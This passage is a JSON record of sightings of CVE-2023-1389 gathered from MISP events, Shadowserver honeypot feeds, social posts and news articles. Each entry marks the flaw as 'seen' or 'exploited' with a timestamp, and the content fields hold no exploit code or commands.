{"vulnerability": "CVE-2023-1389", "sightings": [{"uuid": "6b943a57-7362-465d-9c05-96f2107198da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "adceca4d-4ed4-4663-9445-24a8659b3188", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "MISP/33771cb3-24bc-48e5-98c7-ecefcb509c6e", "content": "", "creation_timestamp": "2024-01-24T19:10:02.000000Z"}, {"uuid": "90c9ec4c-61a3-42e6-a109-19c0e9fad692", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "MISP/85f46621-69f0-47f2-b43c-5e0838c868d1", "content": "", "creation_timestamp": "2024-03-20T18:40:54.000000Z"}, {"uuid": "2f7c22d3-22db-4be8-8c18-79f5207caa88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "MISP/947e084f-1613-471b-9243-411a707faf46", "content": "", "creation_timestamp": "2024-04-19T08:37:16.000000Z"}, {"uuid": "02a5bbc0-350f-461b-a232-fc38942a6ac4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "MISP/0bc52430-3a72-42a3-84a4-294d7afec511", "content": "", "creation_timestamp": "2024-04-18T08:44:37.000000Z"}, {"uuid": "3cd271f8-6f94-459e-8e50-2ac54d20ebb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "MISP/b4b145e0-ef8a-4f27-a016-4cee02135d13", "content": "", "creation_timestamp": "2024-04-19T09:48:04.000000Z"}, {"uuid": "a2c29774-6d4e-4b4f-87ad-89b61a5cf3a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/devcentral.bsky.social/post/3ldquaej7aw2a", "content": "", "creation_timestamp": "2024-12-20T16:58:02.529390Z"}, {"uuid": "81f605c0-bbea-497d-a8e5-733ddcb454da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971809", "content": "", "creation_timestamp": "2024-12-24T20:34:20.180551Z"}, {"uuid": "b9fc2850-44be-4b2b-be25-a40bca1ab8cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/elhackernet.extwitter.link/post/3lecjguji6s26", "content": "", "creation_timestamp": "2024-12-27T17:32:44.784724Z"}, {"uuid": "e45d0038-0a25-44ef-b636-4b91e0e0f89a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-27)", "content": "", "creation_timestamp": "2025-01-27T00:00:00.000000Z"}, {"uuid": "5d2d6f1c-af9e-4cd7-a6b8-0ab8e0710069", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-26)", "content": "", "creation_timestamp": "2025-01-26T00:00:00.000000Z"}, {"uuid": "58a2f5e6-4400-42d4-9973-66b08644aea8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-23)", "content": "", "creation_timestamp": "2024-12-23T00:00:00.000000Z"}, {"uuid": "0711894b-2ffd-4965-8f31-6ad4189def12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-19)", "content": "", "creation_timestamp": "2025-01-19T00:00:00.000000Z"}, {"uuid": "5b2c69b3-39f7-4e10-a962-8b66ae971c1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-21)", "content": "", "creation_timestamp": "2025-01-21T00:00:00.000000Z"}, {"uuid": "e28a11d5-4d0e-4e0b-9f46-328f1ca73af9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-27)", "content": "", "creation_timestamp": "2025-01-27T00:00:00.000000Z"}, {"uuid": "f104727d-7c7c-4484-adfb-aa6eef00d7bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-22)", "content": "", "creation_timestamp": "2025-01-22T00:00:00.000000Z"}, {"uuid": "440313cc-6e9f-4063-bd3e-f8c7e4e4f7ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-24)", "content": "", "creation_timestamp": "2025-01-24T00:00:00.000000Z"}, {"uuid": "b74904b6-15ef-408b-a082-6efec3962e9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-18)", "content": "", "creation_timestamp": "2025-01-18T00:00:00.000000Z"}, {"uuid": "499fc423-6e3c-4938-8822-b3748ee2c1bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-25)", "content": "", "creation_timestamp": "2024-12-25T00:00:00.000000Z"}, {"uuid": "7f510d6c-844b-4a05-9483-40d2fdd68320", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-29)", "content": "", "creation_timestamp": "2024-12-29T00:00:00.000000Z"}, {"uuid": "11771aaf-cb08-4572-aabe-344d2852f22b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-09)", "content": "", "creation_timestamp": "2025-01-09T00:00:00.000000Z"}, {"uuid": "d5afc85e-a9fe-4add-aa95-762478d7e2a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-01)", "content": "", "creation_timestamp": "2025-01-01T00:00:00.000000Z"}, {"uuid": "7495971d-6da7-4c75-9549-894556720f4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-11)", "content": "", "creation_timestamp": "2025-01-11T00:00:00.000000Z"}, {"uuid": "fe5a7ece-4353-4acb-8de3-7d002926c60b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-24)", "content": "", "creation_timestamp": "2024-11-24T00:00:00.000000Z"}, {"uuid": "2974227d-c71f-401a-8b0d-197516de5eda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-02)", "content": "", "creation_timestamp": "2024-11-02T00:00:00.000000Z"}, {"uuid": "8b9a97b1-18e9-465f-a64a-6415be93727c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-24)", "content": "", "creation_timestamp": "2024-10-24T00:00:00.000000Z"}, {"uuid": "064c7013-aaeb-4b72-9338-0ef0996a0027", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-02)", "content": "", "creation_timestamp": "2025-02-02T00:00:00.000000Z"}, {"uuid": "8978e4f2-64f1-4ffe-8680-f31cd31c8098", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-06)", "content": "", "creation_timestamp": "2024-11-06T00:00:00.000000Z"}, {"uuid": "28803180-63f0-4ca3-96dc-3b90d579ba46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-09)", "content": "", "creation_timestamp": "2024-11-09T00:00:00.000000Z"}, {"uuid": "8b8bfd59-a9d2-4824-9f00-e1e0a6edb1cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-07)", "content": "", "creation_timestamp": "2024-11-07T00:00:00.000000Z"}, {"uuid": "d19d9ab2-74c1-4d6c-a060-759fffc549e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-27)", "content": "", "creation_timestamp": "2024-11-27T00:00:00.000000Z"}, {"uuid": "edc05fd7-dafb-4ace-a597-656a9219bb6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-03)", "content": "", "creation_timestamp": "2024-11-03T00:00:00.000000Z"}, {"uuid": "0c5ae50f-20ae-4164-9bd6-688cff0ff976", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-17)", "content": "", "creation_timestamp": "2024-11-17T00:00:00.000000Z"}, {"uuid": "082248cd-779a-40a2-9f57-205e9edb4d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-01)", "content": "", "creation_timestamp": "2024-12-01T00:00:00.000000Z"}, {"uuid": "3b4587ba-a76a-4015-a89a-1241b612c818", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-30)", "content": "", "creation_timestamp": "2024-11-30T00:00:00.000000Z"}, {"uuid": "9a98f0ab-1f4f-4f9e-8093-89900aaa023f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-23)", "content": "", "creation_timestamp": "2024-11-23T00:00:00.000000Z"}, {"uuid": "6bba6467-a013-4ba8-b7ad-4e004e067f34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-02)", "content": "", "creation_timestamp": "2024-12-02T00:00:00.000000Z"}, {"uuid": "193ffb52-0e66-4ccb-8b73-a30309fb5525", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-28)", "content": "", "creation_timestamp": "2024-11-28T00:00:00.000000Z"}, {"uuid": "1ba6b426-26f4-4df9-bc68-0fadfee869ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-20)", "content": "", "creation_timestamp": "2024-11-20T00:00:00.000000Z"}, {"uuid": "7d7fe1fc-6a2e-48d5-9801-b56385e28277", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-09)", "content": "", "creation_timestamp": "2024-12-09T00:00:00.000000Z"}, {"uuid": "d9bb3797-3890-426f-b190-8dbe71d66c92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-26)", "content": "", "creation_timestamp": "2025-01-26T00:00:00.000000Z"}, {"uuid": "a6da0e7a-054e-41c8-8600-3e444566b8c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-17)", "content": "", "creation_timestamp": "2024-12-17T00:00:00.000000Z"}, {"uuid": "4ac05e62-d657-48f4-850b-403b764ea836", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-16)", "content": "", "creation_timestamp": "2024-12-16T00:00:00.000000Z"}, {"uuid": "db20e8dc-60d7-4e73-89a5-c821beac530d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-18)", "content": "", "creation_timestamp": "2024-12-18T00:00:00.000000Z"}, {"uuid": "0fbfe8ed-cb61-48ff-8ae2-3cf5fedc8a9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/astrickland.bsky.social/post/3lknqzxawe22m", "content": "", "creation_timestamp": "2025-03-18T13:19:09.121048Z"}, {"uuid": "0fcb63e1-79a6-44bd-82ee-04b2762ef5cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-10)", "content": "", "creation_timestamp": "2025-01-10T00:00:00.000000Z"}, {"uuid": "ad74d23e-0f7e-47b7-83e2-3d16b68907fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "4316c192-bc19-45d5-aa97-7410a9943a25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-03)", "content": "", "creation_timestamp": "2025-02-03T00:00:00.000000Z"}, {"uuid": "88ff95a4-59e0-44bb-a31c-4831cc254425", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-08)", "content": "", "creation_timestamp": "2025-02-08T00:00:00.000000Z"}, {"uuid": "34390388-96aa-44e9-9231-5f089a5f5ce9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://threatintel.cc/2025/03/12/new-ballista-botnet-spreads-using.html", "content": "", "creation_timestamp": "2025-03-12T09:56:48.000000Z"}, {"uuid": "7110d9fe-1a93-4865-a76e-1df8da6392be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/runzero.com/post/3lknsvhpank2z", "content": "", "creation_timestamp": "2025-03-18T13:52:25.970847Z"}, {"uuid": "18e520e7-540c-4aac-8e22-dc03407ff03a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/ravirockks.bsky.social/post/3lkkgujtrh32v", "content": "", "creation_timestamp": "2025-03-17T05:39:23.437058Z"}, {"uuid": "2b84d75d-be3b-4248-8b10-ac7ece70a5be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3lk4uws27d62o", "content": "", "creation_timestamp": "2025-03-11T20:13:41.094843Z"}, {"uuid": "f39d5de8-2f46-4d10-b9ce-cc8d7528c639", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://threatintel.cc/2025/03/12/previously-unidentified-botnet-infects-unpatched.html", "content": "", "creation_timestamp": "2025-03-12T10:58:23.000000Z"}, {"uuid": "04fbdd23-f470-4059-a31e-f2ef3c5e7115", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lk4wuyhddc2x", "content": "", "creation_timestamp": "2025-03-11T20:48:31.563828Z"}, {"uuid": "35635030-0143-440e-947b-c373b3c88e9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-08)", "content": "", "creation_timestamp": "2025-03-08T00:00:00.000000Z"}, {"uuid": "7eb6e42b-338a-47eb-828b-01bbaa794388", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/mbissey.bsky.social/post/3lk6xhcvatz2k", "content": "", "creation_timestamp": "2025-03-12T16:04:02.638893Z"}, {"uuid": "61d87bab-4f6a-4067-a265-79803658dc59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "a2d5a9d1-aff7-4398-badc-e2583f4aa9b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/ravirockks.bsky.social/post/3lkkgujtxcl2v", "content": "", "creation_timestamp": "2025-03-17T05:39:23.946689Z"}, {"uuid": "aef500f9-5a0b-4687-b80c-7ad2f8d37431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/ravirockks.bsky.social/post/3lkkgujtybt2v", "content": "", "creation_timestamp": "2025-03-17T05:39:24.427283Z"}, {"uuid": "b9862629-9be2-42f8-ad57-fc9335548951", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-12)", "content": "", "creation_timestamp": "2025-02-12T00:00:00.000000Z"}, {"uuid": "4c713b8a-39e2-41e2-a473-8d8ef9e1763a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-22)", "content": "", "creation_timestamp": "2025-02-22T00:00:00.000000Z"}, {"uuid": "cec23f1a-fe7d-41ef-ad88-61710e1efbda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-18)", "content": "", "creation_timestamp": "2025-02-18T00:00:00.000000Z"}, {"uuid": "bab66645-b897-4a65-9e74-93767ce5e8b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://threatintel.cc/2025/03/11/ballista-botnet-exploits-unpatched-tplink.html", "content": "", "creation_timestamp": "2025-03-11T22:38:56.000000Z"}, {"uuid": "7c0fbee1-dcd8-466a-a6d3-529b11a9d140", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-18)", "content": "", "creation_timestamp": "2025-02-18T00:00:00.000000Z"}, {"uuid": "0bd3a466-e6d7-441c-ad12-bf8f07eca375", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-14)", "content": "", "creation_timestamp": "2025-02-14T00:00:00.000000Z"}, {"uuid": "0302461c-f3e4-4c13-ad66-40b70b67639a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://bsky.app/profile/bluehatcyber.bsky.social/post/3lk47a4fv2k23", "content": "", "creation_timestamp": "2025-03-11T13:45:12.105427Z"}, {"uuid": "23891063-d04c-47bd-873e-6baf6864a40c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-23)", "content": "", "creation_timestamp": "2025-02-23T00:00:00.000000Z"}, {"uuid": "2d6342d2-b63f-4774-99f2-10da83cb4c39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "MISP/62c6a529-5cd9-4c43-9896-d8866a5a4de0", "content": "", "creation_timestamp": "2025-03-13T15:56:07.000000Z"}, {"uuid": "6decc07e-3b8b-42f1-9a67-fa26ae27df54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-23)", "content": "", "creation_timestamp": "2025-02-23T00:00:00.000000Z"}, {"uuid": "ff428c23-6f9a-48fd-9131-842affab0264", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://www.schneier.com/blog/archives/2025/03/tp-link-router-botnet.html", "content": "", "creation_timestamp": "2025-03-14T03:23:03.000000Z"}, {"uuid": "67769126-b701-4ee2-a38c-0cf6445498e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://thehackernews.com/2025/03/ballista-botnet-exploits-unpatched-tp.html", "content": "", "creation_timestamp": "2025-03-11T11:30:00.000000Z"}, {"uuid": "7da3419d-049c-4a2d-8b95-eb51d3388a7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:40.000000Z"}, {"uuid": "269d41a6-2034-4a4c-bb6c-3fa12a4729cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": 